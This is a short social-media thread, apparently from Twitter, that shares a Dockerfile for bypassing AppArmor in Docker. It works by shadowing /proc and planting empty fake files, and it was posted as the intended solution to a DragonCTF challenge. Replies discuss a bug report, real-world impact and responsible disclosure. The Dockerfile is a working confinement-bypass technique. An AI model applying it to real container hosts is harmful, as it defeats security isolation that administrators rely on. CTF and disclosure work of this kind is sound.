|
@adam_iwaniuk | |||||
|
Docker apparmor bypass:
FROM ubuntu:18.04
# get rid of procfs
VOLUME /proc
# fake files to avoid fail on run
COPY empty /proc/self/attr/exec
COPY empty /proc/self/fd/4
COPY empty /proc/self/fd/5
COPY empty /proc/self/status
# cmd will not have apparmor restrictions
CMD YOUR_CMD
|
||||||
|
||||||
|
Adam Iwaniuk
@adam_iwaniuk
|
22. ruj |
|
It was intended solution to one of the challenges in DragonCTF organized by @DragonSectorCTF this weekend. It was solved by one team, @allesctf congratulations!
|
||
|
|
||
|
leoluk@chaos.social
@leolukde
|
22. ruj |
|
Our writeup/bug report for the AppArmor bypass: github.com/opencontainers… @allesctf
|
||
|
|
||
|
Bill Plein 🏴☠️
@billplein
|
23. ruj |
|
I totally get the cool solution for the CTF but what practical application does the bug report solve?
The only one I can think of is where a private registry scanner requires Ubuntu and the image scan passes.
I can create a base image with any security holes I want.
(1/2)
|
||
|
|
||
|
Bill Plein 🏴☠️
@billplein
|
23. ruj |
|
The same situation could be created with a malicious Ubuntu install on a VM. Or on bare metal with SAN Storage.
It is an Ubuntu problem. And requires insider access or running VMs or Container images blindly.
|
||
|
|
||
|
ytcracker 🎤💻🔬🗝🏴☠️🤙
@realytcracker
|
23. ruj |
|
na zdorovie
|
||
|
|
||
|
Sune Keller
@sirlatrom
|
23. ruj |
|
What about responsible disclosure?
|
||
|
|
||